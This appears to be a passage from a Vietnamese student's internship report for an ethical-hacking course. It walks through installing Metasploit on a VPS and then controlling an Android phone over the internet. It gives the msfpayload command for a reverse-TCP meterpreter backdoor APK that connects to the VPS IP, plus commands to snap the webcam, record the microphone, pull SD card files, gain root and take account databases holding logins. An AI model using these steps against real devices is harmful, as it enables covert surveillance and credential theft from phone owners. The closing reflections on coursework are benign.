II. THỰC HIỆN TRÊN MÔI TRƯỜNG INTERNET
1.1Cài đặt Metasploit lên VPS
1. Giới thiệu
Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python.
Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS.
2. Cài đặt
Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn phiên bản Community miễn phí và dùng cho nghiên cứu.
Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm khác.
Chọn folder cài đặt:
Chọn server và ngày hết hạn, để mặc định:
Click vào link:https://localhost:3790/sẽ dẫn đến trang tạo tài khoản để login vào Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create Account:
Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:
2.TỪ VPS ĐIỀU KHIỂN THIẾT BỊ QUA INTERNET
Các bước thực hiện
1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS
Chúng ta vẫn sử dụng lệnh“Msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk” ở đây địa chỉ VPS là 14.0.21.132
3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác là sử dụng chính IP của VPS
Để xem các lệnh ta gõ help
Để xem thông tin về máy, nhập lệnh SysInfo Để xem các tác vụ đang chạy gõ ps
Xem ip gõ ipconfig
Xem danh sách thư mục, file gõ ls Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước.
Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục Dùng lệnh cd /sdcard/Download để vào thư mục
Để tải về máy, ta nhập lệnh Download App.apk
để upload gõ lệnh upload
Và file này sẽ được tải về thư mục root của máy Kali Gõ shell để vào lệnh
kiểm tra xem có root chưa gõ su
whoami
Nếu báo unknown id is 0 tức là đã root ls -l danh mục file và các quyền
cd để chuyển hướng thư mục (adsbygoogle = window.adsbygoogle || []).push({});
Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/
để xem danh sách và down load các file hay thay đổi các file trong ROM đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data
^C để quay lại
KẾT QUẢ ĐẠT ĐƯỢC QUA ĐỢT THỰC TẬP
Những kiến thức lý thuyết đã được củng cố:
Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành Android
Tìm hiểu về hệ điều hành Kali Linux
Tìm hiểu về các lỗ hổng bảo mật của Windows và Android
Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng Những kỹ năng thực hành đã được học thêm:
Thực hiện cài đặt Android trên máy ảo
Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của Windows và Android
Thi lấy chứng chỉ System Hacking của trung tâm Athena
Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào Android
Biết thêm về một số bài học trong lớp Hacker mũ trắng Những kinh nghiệm thực tiễn đã tích lũy được:
Qua gần 3 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu, thứ nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới bên cạnh các kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanh nghiệp đã cho em làm quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thông qua các kĩ năng giao tiếp và ứng xử.